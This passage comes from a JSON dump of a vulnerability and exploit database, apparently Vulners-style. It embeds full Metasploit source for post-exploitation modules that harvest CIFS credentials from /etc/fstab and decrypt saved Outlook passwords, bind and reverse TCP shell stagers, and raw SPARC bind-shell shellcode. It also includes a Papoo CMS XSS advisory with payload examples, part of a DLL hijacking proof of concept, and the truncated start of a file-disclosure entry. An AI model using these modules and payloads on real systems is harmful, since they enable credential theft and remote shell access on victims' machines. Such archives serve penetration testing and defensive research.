\"\\xab\\x9f\\xb6\\xb1\\x6c\\x84\\x22\\x03\\x57\\x01\\x5e\\x1d\\xe1\\x11\\xb9\\x48\"\n lnk << \"\\x08\\x00\\x27\\x6f\\xe3\\x1f\\x00\\x00\\x00\\x00\"\n\n print_status \"Done. Writing to disk - #{session.fs.dir.pwd}\\\\#{datastore['LNKFILENAME']}\"\n file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')\n file.write(lnk)\n file.close\n print_status \"Done. Wait for evil to happen..\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/escalate/droplnk.rb"}, {"lastseen": "2020-01-08T02:10:14", "bulletinFamily": "exploit", "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in /etc/fstab on a Linux system.\n", "modified": "2017-09-30T02:34:38", "published": "2012-02-01T16:50:50", "id": "MSF:POST/LINUX/GATHER/MOUNT_CIFS_CREDS", "href": "", "type": "metasploit", "title": "Linux Gather Saved mount.cifs/mount.smbfs Credentials", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather Saved mount.cifs/mount.smbfs Credentials',\n 'Description' => %q{\n Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Jon Hart <jhart[at]spoofed.org>'],\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n ))\n end\n\n def run\n # keep track of any of the credentials files we read so we only read them once\n cred_files = []\n # where we'll store hashes of found credentials while parsing. reporting is done at the end.\n creds = []\n # A table to store the found credentials for loot storage afterward\n cred_table = Rex::Text::Table.new(\n 'Header' => \"mount.cifs credentials\",\n 'Indent' => 1,\n 'Columns' =>\n [\n \"Username\",\n \"Password\",\n \"Server\",\n \"File\"\n ])\n\n # parse each line from /etc/fstab\n fail_with(Failure::NotFound, '/etc/fstab not found on system') unless file_exist?('/etc/fstab')\n read_file(\"/etc/fstab\").each_line do |fstab_line|\n fstab_line.strip!\n # where we'll store the current parsed credentials, if any\n cred = {}\n # if the fstab line utilizies the credentials= option, read the credentials from that file\n if (fstab_line =~ /\\/\\/([^\\/]+)\\/\\S+\\s+\\S+\\s+cifs\\s+.*/)\n cred[:host] = $1\n # IPs can occur using the ip option, which is a backup/alternative\n # to letting UNC resolution do its thing\n cred[:host] = $1 if (fstab_line =~ /ip=([^, ]+)/)\n if (fstab_line =~ /cred(?:entials)?=([^, ]+)/)\n file = $1\n # skip if we've already parsed this credentials file\n next if (cred_files.include?(file))\n # store it if we haven't\n cred_files << file\n # parse the credentials\n cred.merge!(parse_credentials_file(file))\n # if the credentials are directly in /etc/fstab, parse them\n elsif (fstab_line =~ /\\/\\/([^\\/]+)\\/\\S+\\s+\\S+\\s+cifs\\s+.*(?:user(?:name)?|pass(?:word)?)=/)\n cred.merge!(parse_fstab_credentials(fstab_line))\n end\n\n creds << cred\n end\n end\n\n # all done. clean up, report and loot.\n creds.flatten!\n creds.compact!\n creds.uniq!\n creds.each do |cred|\n if (Rex::Socket.dotted_ip?(cred[:host]))\n report_cred(\n ip: cred[:host],\n port: 445,\n service_name: 'smb',\n user: cred[:user],\n password: cred[:pass],\n proof: '/etc/fstab'\n )\n end\n cred_table << [ cred[:user], cred[:pass], cred[:host], cred[:file] ]\n end\n\n # store all found credentials\n unless (cred_table.rows.empty?)\n print_line(\"\\n\" + cred_table.to_s)\n p = store_loot(\n \"mount.cifs.creds\",\n \"text/csv\",\n session,\n cred_table.to_csv,\n \"mount_cifs_credentials.txt\",\n \"mount.cifs credentials\")\n print_status(\"CIFS credentials saved in: #{p.to_s}\")\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password,\n session_id: session_db_id,\n post_reference_name: self.refname\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # Parse mount.cifs credentials from +line+, assumed to be a line from /etc/fstab.\n # Returns the username+domain and password as a hash.\n def parse_fstab_credentials(line, file=\"/etc/fstab\")\n creds = {}\n # get the username option, which comes in one of four ways\n user_opt = $1 if (line =~ /user(?:name)?=([^, ]+)/)\n case user_opt\n # domain/user%pass\n when /^([^\\/]+)\\/([^%]+)%(.*)$/\n creds[:user] = \"#{$1}\\\\#{$2}\"\n creds[:pass] = $3\n # domain/user\n when /^([^\\/]+)\\/([^%]+)$/\n creds[:user] = \"#{$1}\\\\#{$2}\"\n # user%password\n when /^([^%]+)%(.*)$/\n creds[:user] = $1\n creds[:pass] = $2\n # user\n else\n creds[:user] = user_opt\n end if (user_opt)\n\n # get the password option if any\n creds[:pass] = $1 if (line =~ /pass(?:word)?=([^, ]+)/)\n\n # get the domain option, if any\n creds[:user] = \"#{$1}\\\\#{creds[:user]}\" if (line =~ /dom(?:ain)?=([^, ]+)/)\n\n creds[:file] = file unless (creds.empty?)\n\n creds\n end\n\n # Parse mount.cifs credentials from +file+, returning the username+domain and password\n # as a hash.\n def parse_credentials_file(file)\n creds = {}\n domain = nil\n read_file(file).each_line do |credfile_line|\n case credfile_line\n when /domain=(.*)/\n domain = $1\n when /password=(.*)/\n creds[:pass] = $1\n when /username=(.*)/\n creds[:user] = $1\n end\n end\n # prepend the domain if one was found\n creds[:user] = \"#{domain}\\\\#{creds[:user]}\" if (domain and creds[:user])\n creds[:file] = file unless (creds.empty?)\n\n creds\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/mount_cifs_creds.rb"}, {"lastseen": "2019-11-06T21:57:10", "bulletinFamily": "exploit", "description": "This module extracts and decrypts saved Microsoft Outlook (versions 2002-2010) passwords from the Windows Registry for POP3/IMAP/SMTP/HTTP accounts. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password.\n", "modified": "2019-03-24T23:11:22", "published": "2011-09-07T15:30:08", "id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/OUTLOOK", "href": "", "type": "metasploit", "title": "Windows Gather Microsoft Outlook Saved Password Extraction", "sourceData": "# -*- coding: binary -*-\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Post::Windows::Priv\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Gather Microsoft Outlook Saved Password Extraction',\n 'Description' => %q{\n This module extracts and decrypts saved Microsoft\n Outlook (versions 2002-2010) passwords from the Windows\n Registry for POP3/IMAP/SMTP/HTTP accounts.\n In order for decryption to be successful, this module must be\n executed under the same privileges as the user which originally\n encrypted the password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Justin Cacak' ], # Updated to work with newer versions of Outlook (2013, 2016, Office 365)\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ])\n )\n end\n\n def prepare_railgun\n rg = session.railgun\n if !rg.get_dll('crypt32')\n rg.add_dll('crypt32')\n end\n end\n\n def decrypt_password(data)\n rg = session.railgun\n pid = client.sys.process.getpid\n process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)\n\n mem = process.memory.allocate(128)\n process.memory.write(mem, data)\n\n if session.sys.process.each_process.find { |i| i[\"pid\"] == pid } [\"arch\"] == \"x86\"\n addr = [mem].pack(\"V\")\n len = [data.length].pack(\"V\")\n ret = rg.crypt32.CryptUnprotectData(\"#{len}#{addr}\", 16, nil, nil, nil, 0, 8)\n len, addr = ret[\"pDataOut\"].unpack(\"V2\")\n else\n addr = [mem].pack(\"Q\")\n len = [data.length].pack(\"Q\")\n ret = rg.crypt32.CryptUnprotectData(\"#{len}#{addr}\", 16, nil, nil, nil, 0, 16)\n len, addr = ret[\"pDataOut\"].unpack(\"Q2\")\n end\n\n return \"\" if len == 0\n\n decrypted_pw = process.memory.read(addr, len)\n return decrypted_pw\n end\n\n # Just a wrapper to avoid copy pasta and long lines\n def get_valdata(key, name)\n registry_getvaldata(\"#{@key_base}\\\\#{key}\", name)\n end\n\n def get_registry(outlook_ver)\n # Determine if saved accounts exist within Outlook. Ignore the Address Book and Personal Folder registry entries.\n outlook_exists = 0\n saved_accounts = 0\n\n # Check for registry key based on Outlook version pulled from registry\n @key_base = \"HKCU\\\\Software\\\\Microsoft\\\\Office\\\\#{outlook_ver}.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\"\n next_account_id = get_valdata(\"\", 'NextAccountID')\n\n # Default to original registry key for module\n if next_account_id.nil?\n @key_base = \"HKCU\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows Messaging Subsystem\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\"\n next_account_id = get_valdata(\"\", 'NextAccountID')\n end\n\n if !next_account_id.nil?\n # Microsoft Outlook not found\n\n print_status \"Microsoft Outlook found in Registry...\"\n outlook_exists = 1\n registry_enumkeys(@key_base).each do |k|\n display_name = get_valdata(k, 'Display Name')\n\n if display_name.nil?\n # Microsoft Outlook found, but no account data saved in this location\n next\n end\n\n # Account found - parse through registry data to determine account type. Parse remaining registry data after to speed up module.\n saved_accounts = 1\n got_user_pw = 0\n\n displayname = get_valdata(k, 'Display Name')\n email = get_valdata(k, 'Email')\n pop3_server = get_valdata(k, 'POP3 Server')\n smtp_server = get_valdata(k, 'SMTP Server')\n http_server_url = get_valdata(k, 'HTTP Server URL')\n imap_server = get_valdata(k, 'IMAP Server')\n smtp_use_auth = get_valdata(k, 'SMTP Use Auth')\n if !smtp_use_auth.nil?\n smtp_user = get_valdata(k, 'SMTP User')\n smtp_password = get_valdata(k, 'SMTP Password')\n smtp_auth_method = get_valdata(k, 'SMTP Auth Method')\n end\n\n if !pop3_server.nil?\n type = \"POP3\"\n elsif !http_server_url.nil?\n type = \"HTTP\"\n elsif !imap_server.nil?\n type = \"IMAP\"\n else\n type = \"UNKNOWN\"\n end\n\n # Decrypt password and output results. Need to do each separately due to the way Microsoft stores them.\n print_good(\"Account Found:\")\n print_status(\" Type: #{type}\")\n print_status(\" User Display Name: #{displayname}\")\n print_status(\" User Email Address: #{email}\")\n\n if type == \"POP3\"\n pop3_pw = get_valdata(k, 'POP3 Password')\n pop3_user = get_valdata(k, 'POP3 User')\n pop3_use_spa = get_valdata(k, 'POP3 Use SPA')\n smtp_port = get_valdata(k, 'SMTP Port')\n\n print_status(\" User Name: #{pop3_user}\")\n if pop3_pw.nil?\n print_status(\" User Password: <not stored>\")\n else\n pop3_pw.slice!(0, 1)\n pass = decrypt_password(pop3_pw)\n print_status(\" User Password: #{pass}\")\n # Prepare data for creds\n got_user_pw = 1\n host = pop3_server\n user = pop3_user\n end\n\n if !pop3_use_spa.nil? # Account for SPA (NTLM auth)\n print_status(\" Secure Password Authentication (SPA): Enabled\")\n end\n\n print_status(\" Incoming Mail Server (POP3): #{pop3_server}\")\n\n pop3_use_ssl = get_valdata(k, 'POP3 Use SSL')\n if pop3_use_ssl.nil?\n print_status(\" POP3 Use SSL: No\")\n else\n print_status(\" POP3 Use SSL: Yes\")\n end\n\n pop3_port = get_valdata(k, 'POP3 Port')\n if pop3_port.nil?\n print_status(\" POP3 Port: 110\")\n portnum = 110\n else\n print_status(\" POP3 Port: #{pop3_port}\")\n portnum = pop3_port\n end\n\n if smtp_use_auth.nil? # Account for SMTP servers requiring authentication\n print_status(\" Outgoing Mail Server (SMTP): #{smtp_server}\")\n else\n print_status(\" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]\")\n # Check if smtp_auth_method is null. If so, the inbound credentials are utilized\n if smtp_auth_method.nil?\n smtp_user = pop3_user\n smtp_decrypted_password = pass\n else\n smtp_password.slice!(0, 1)\n smtp_decrypted_password = decrypt_password(smtp_password)\n end\n print_status(\" Outgoing Mail Server (SMTP) User Name: #{smtp_user}\")\n print_status(\" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}\")\n end\n\n smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')\n if smtp_use_ssl.nil?\n print_status(\" SMTP Use SSL: No\")\n else\n print_status(\" SMTP Use SSL: Yes\")\n end\n\n if smtp_port.nil?\n print_status(\" SMTP Port: 25\")\n smtp_port = 25\n else\n print_status(\" SMTP Port: #{smtp_port}\")\n end\n\n elsif type == \"HTTP\"\n http_password = get_valdata(k, 'HTTP Password')\n http_user = get_valdata(k, 'HTTP User')\n http_use_spa = get_valdata(k, 'HTTP Use SPA')\n\n print_status(\" User Name: #{http_user}\")\n if http_password.nil?\n print_status(\" User Password: <not stored>\")\n else\n http_password.slice!(0, 1)\n pass = decrypt_password(http_password)\n print_status(\" User Password: #{pass}\")\n got_user_pw = 1\n host = http_server_url\n user = http_user\n\n # Detect 80 or 443 for creds\n http_server_url.downcase!\n if http_server_url.include? \"h\\x00t\\x00t\\x00p\\x00s\"\n portnum = 443\n else\n portnum = 80\n end\n end\n\n if !http_use_spa.nil? # Account for SPA (NTLM auth)\n print_status(\" Secure Password Authentication (SPA): Enabled\")\n end\n\n print_status(\" HTTP Server URL: #{http_server_url}\")\n\n elsif type == \"IMAP\"\n imap_user = get_valdata(k, 'IMAP User')\n imap_use_spa = get_valdata(k, 'IMAP Use SPA')\n imap_password = get_valdata(k, 'IMAP Password')\n smtp_port = get_valdata(k, 'SMTP Port')\n\n print_status(\" User Name: #{imap_user}\")\n if imap_password.nil?\n print_status(\" User Password: <not stored>\")\n else\n imap_password.slice!(0, 1)\n pass = decrypt_password(imap_password)\n print_status(\" User Password: #{pass}\")\n got_user_pw = 1\n host = imap_server\n user = imap_user\n end\n\n if !imap_use_spa.nil? # Account for SPA (NTLM auth)\n print_status(\" Secure Password Authentication (SPA): Enabled\")\n end\n\n print_status(\" Incoming Mail Server (IMAP): #{imap_server}\")\n\n imap_use_ssl = get_valdata(k, 'IMAP Use SSL')\n if imap_use_ssl.nil?\n print_status(\" IMAP Use SSL: No\")\n else\n print_status(\" IMAP Use SSL: Yes\")\n end\n\n imap_port = get_valdata(k, 'IMAP Port')\n if imap_port.nil?\n print_status(\" IMAP Port: 143\")\n portnum = 143\n else\n print_status(\" IMAP Port: #{imap_port}\")\n portnum = imap_port\n end\n\n if smtp_use_auth.nil? # Account for SMTP servers requiring authentication\n print_status(\" Outgoing Mail Server (SMTP): #{smtp_server}\")\n else\n print_status(\" Outgoing Mail Server (SMTP): #{smtp_server} [Authentication Required]\")\n # Check if smtp_auth_method is null. If so, the inbound credentials are utilized\n if smtp_auth_method.nil?\n smtp_user = imap_user\n smtp_decrypted_password = pass\n else\n smtp_password.slice!(0, 1)\n smtp_decrypted_password = decrypt_password(smtp_password)\n end\n print_status(\" Outgoing Mail Server (SMTP) User Name: #{smtp_user}\")\n print_status(\" Outgoing Mail Server (SMTP) Password: #{smtp_decrypted_password}\")\n end\n\n smtp_use_ssl = get_valdata(k, 'SMTP Use SSL')\n if smtp_use_ssl.nil?\n print_status(\" SMTP Use SSL: No\")\n else\n print_status(\" SMTP Use SSL: Yes\")\n end\n\n if smtp_port.nil?\n print_status(\" SMTP Port: 25\")\n smtp_port = 25\n else\n print_status(\" SMTP Port: #{smtp_port}\")\n end\n\n end\n\n if got_user_pw == 1\n service_data = {\n address: Rex::Socket.getaddress(host),\n port: portnum,\n protocol: \"tcp\",\n service_name: type,\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: refname,\n username: user,\n private_data: pass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n\n if !smtp_use_auth.nil?\n service_data = {\n address: Rex::Socket.getaddress(smtp_server),\n port: smtp_port,\n protocol: \"tcp\",\n service_name: \"smtp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: refname,\n username: smtp_user,\n private_data: smtp_decrypted_password,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n\n print_status(\"\")\n end\n end\n\n if outlook_exists == 0\n print_status(\"Microsoft Outlook not installed or Exchange accounts are being used.\")\n elsif saved_accounts == 0\n print_status(\"Microsoft Outlook installed however no accounts stored in Registry.\")\n end\n\n end\n\n def outlook_version\n val = registry_getvaldata(\"HKCR\\\\Outlook.Application\\\\CurVer\", \"\")\n if !val.nil?\n idx = val.rindex(\".\")\n val[idx + 1..-1]\n end\n end\n\n def run\n\n # Get Outlook version from registry\n outlook_ver = outlook_version\n fail_with(Failure::NotFound, \"Microsoft Outlook version not found in registry.\") if outlook_ver.nil?\n\n print_status(\"Microsoft Outlook Version: #{outlook_ver}\")\n uid = session.sys.config.getuid # Get uid. Decryption will only work if executed under the same user account as the password was encrypted.\n # **This isn't entirely true. The Master key and decryption can be retrieved using Mimikatz but it seems like more work than it's worth.\n\n if is_system?\n print_error(\"This module is running under #{uid}.\")\n print_error(\"Automatic decryption will not be possible.\")\n print_error(\"Migrate to a user process to achieve successful decryption (e.g. explorer.exe).\")\n else\n print_status(\"Searching for Microsoft Outlook in Registry...\")\n prepare_railgun\n get_registry(outlook_ver)\n end\n\n print_status(\"Complete\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/outlook.rb"}, {"lastseen": "2019-12-14T00:16:06", "bulletinFamily": "exploit", "description": "Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)\n", "modified": "2017-07-24T13:26:21", "published": "2008-11-18T21:01:26", "id": "MSF:PAYLOAD/LINUX/X86/METERPRETER/BIND_IPV6_TCP", "href": "", "type": "metasploit", "title": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/linux/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 120\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux::BindTcp\n\n def self.handler_type_alias\n 'bind_ipv6_tcp'\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind IPv6 TCP Stager (Linux x86)',\n 'Description' => 'Listen for an IPv6 connection (Linux x86)',\n 'Author' => [ 'kris katterjohn', 'egypt' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => true }\n ))\n end\n\n def use_ipv6\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb"}, {"lastseen": "2020-01-06T05:16:00", "bulletinFamily": "exploit", "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker\n", "modified": "2018-02-15T21:10:26", "published": "2006-01-21T22:10:20", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPMETERPRETER/REVERSE_TCP", "href": "", "type": "metasploit", "title": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 283\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcp\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' => {'RequiresMidstager' => false}\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp.rb"}, {"lastseen": "2019-11-30T12:13:46", "bulletinFamily": "exploit", "description": "Listen for a connection and spawn a command shell\n", "modified": "2017-07-24T13:26:21", "published": "2005-10-11T22:37:41", "id": "MSF:PAYLOAD/BSD/SPARC/SHELL_BIND_TCP", "href": "", "type": "metasploit", "title": "BSD Command Shell, Bind TCP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 164\n\n include Msf::Payload::Single\n include Msf::Payload::Bsd\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'BSD Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell',\n 'Author' => 'vlad902',\n 'License' => MSF_LICENSE,\n 'Platform' => 'bsd',\n 'Arch' => ARCH_SPARC,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell))\n end\n\n def generate\n port = (datastore['RPORT'] || 0).to_i\n payload =\n \"\\x9c\\x2b\\xa0\\x07\\x94\\x1a\\xc0\\x0b\\x92\\x10\\x20\\x01\\x90\\x10\\x20\\x02\" +\n \"\\x82\\x10\\x20\\x61\\x91\\xd0\\x20\\x08\\xd0\\x23\\xbf\\xf8\" +\n Rex::Arch::Sparc.set(0xff020000 | port, \"l0\") +\n \"\\xe0\\x23\\xbf\\xf0\\xc0\\x23\\xbf\\xf4\\x92\\x23\\xa0\\x10\\x94\\x10\\x20\\x10\" +\n \"\\x82\\x10\\x20\\x68\\x91\\xd0\\x20\\x08\\xd0\\x03\\xbf\\xf8\\x92\\x10\\x20\\x01\" +\n \"\\x82\\x10\\x20\\x6a\\x91\\xd0\\x20\\x08\\xd0\\x03\\xbf\\xf8\\x92\\x1a\\x40\\x09\" +\n \"\\x94\\x12\\x40\\x09\\x82\\x10\\x20\\x1e\\x91\\xd0\\x20\\x08\\xd0\\x23\\xbf\\xf8\" +\n \"\\x92\\x10\\x20\\x03\\x92\\xa2\\x60\\x01\\x82\\x10\\x20\\x5a\\x91\\xd0\\x20\\x08\" +\n \"\\x12\\xbf\\xff\\xfd\\xd0\\x03\\xbf\\xf8\\x94\\x1a\\xc0\\x0b\\x21\\x0b\\xd8\\x9a\" +\n \"\\xa0\\x14\\x21\\x6e\\x23\\x0b\\xdc\\xda\\x90\\x23\\xa0\\x10\\x92\\x23\\xa0\\x08\" +\n \"\\xe0\\x3b\\xbf\\xf0\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\x82\\x10\\x20\\x3b\" +\n \"\\x91\\xd0\\x20\\x08\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:VULN:14155", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14155", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory: Persistent XSS Vulnerability in CMS Papoo Light v6\r\nAdvisory ID: SROEADV-2014-01\r\nAuthor: Steffen R\u0446semann\r\nAffected Software: CMS Papoo Version 6.0.0 Rev. 4701\r\nVendor URL: http://www.papoo.de/\r\nVendor Status: fixed\r\nCVE-ID: -\r\n\r\n==========================\r\nVulnerability Description:\r\n==========================\r\n\r\nThe CMS Papoo Light Version has a persistent XSS vulnerability in its guestbook functionality and in its user-registration functionality.\r\n\r\n==================\r\nTechnical Details:\r\n==================\r\n\r\nXSS-Vulnerability #1:\r\n\r\nPapoo Light CMS v6 provides the functionality to post comments on a guestbook via the following url: http://{target-url}/guestbook.php?menuid=6.\r\n\r\nThe input fields with the id \u201eauthor\u201c is vulnerable to XSS which gets stored in the database and makes that vulnerability persistent.\r\n\r\nPayload-Examples:\r\n\r\n<img src='n' onerror=\u201cjavascript:alert('XSS')\u201c >\r\n<iframe src=\u201csome_remote_source\u201c></iframe>\r\n\r\nXSS-Vulnerability #2:\r\n\r\nPeople can register themselves on Papoo Light v6 CMS at http://{target-url}/account.php?menuid=2. Instead of using a proper username, an attacker can inject HTML and/or JavaScriptcode on the username input-field.\r\n\r\nCode gets written to the database backend then. Attacker only has to confirm his/her e-mail address to be able to login and spread the code by posting to the forum or the guestbook where the username is displayed.\r\n\r\nPayload-Examples:\r\n\r\nsee above (XSS #1)\r\n\r\n=========\r\nSolution:\r\n=========\r\n\r\nUpdate to the latest version\r\n\r\n====================\r\nDisclosure Timeline:\r\n====================\r\n13-Dec-2014 \u2013 found XSS #1\r\n13-Dec-2014 - informed the developers (XSS #1)\r\n14-Dec-2014 \u2013 found XSS #2\r\n14-Dec-2014 \u2013 informed the developers (XSS #2)\r\n15-Dec-2014 - release date of this security advisory\r\n15-Dec-2014 - response and fix by vendor\r\n15-Dec-2014 - post on BugTraq\r\n\r\n========\r\nCredits:\r\n========\r\n\r\nVulnerability found and advisory written by Steffen R\u0446semann.\r\n\r\n===========\r\nReferences:\r\n===========\r\n\r\nhttp://www.papoo.de/\r\nhttp://sroesemann.blogspot.de\r\n\r\n", "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:DOC:31531", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31531", "title": "Persistent XSS Vulnerability in CMS Papoo Light v6.0.0 Rev. 4701", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-19T03:08:05", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2010-09-23T00:00:00", "published": "2010-09-23T00:00:00", "id": "1337DAY-ID-14155", "href": "https://0day.today/exploit/description/14155", "type": "zdt", "title": "VideoCharge Studio DLL Hijacking Exploit (dwmapi.dll, quserex.dll)", "sourceData": "==================================================================\r\nVideoCharge Studio DLL Hijacking Exploit (dwmapi.dll, quserex.dll)\r\n==================================================================\r\n\r\n/*\r\n#VideoCharge Studio DLL Hijacking Exploit (dwmapi.dll , quserex.dll )\r\n#Author : anT!-Tr0J4n\r\n#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends\r\n#Email : [email\u00a0protected] & [email\u00a0protected]\r\n# Software Link:http://www.videocharge.com/Index.php\r\n#Tested on: Windows XP sp3\r\n#how to use :\r\nplace anT!-Tr0j4n.vsc file and dwmapi.dl, quserex.dll it in the same dir Execute to check the\r\n result > Hack3d\r\n \r\n\r\n\r\n \r\n#dwmapi.dll , quserex.dll (code)\r\n*/\r\n \r\n#include \"stdafx.h\"\r\n \r\nvoid init() {\r\nMessageBox(NULL,\"anT!-Tr0J4n\", \"Hack3d\",0x00000003);\r\n}\r\n \r\n \r\nBOOL APIENTRY DllMain( HANDLE hModule,\r\n DWORD ul_reason_for_call,\r\n LPVOID lpReserved\r\n )\r\n{\r\n switch (ul_reason_for_call)\r\n{\r\ncase DLL_PROCESS_ATTACH:\r\n init();break;\r\ncase DLL_THREAD_ATTACH:\r\ncase DLL_THREAD_DETACH:\r\n case DLL_PROCESS_DETACH:\r\nbreak;\r\n }\r\n return TRUE;\r\n}\r\n\r\n\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/14155"}, {"lastseen": "2018-04-10T07:36:54", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-01-18T00:00:00", "published": "2009-01-18T00:00:00", "id": "1337DAY-ID-4701", "href": "https://0day.today/exploit/description/4701", "type": "zdt", "title": "ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability", "sourceData": "=====================================================================\r\nESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability\r\n=====================================================================\r\n\r\n\r\n .::ESPG 1.72 File Disclosure Vulnerability::.\r\n \r\n \r\n\r\n => Scriptname: ESPG 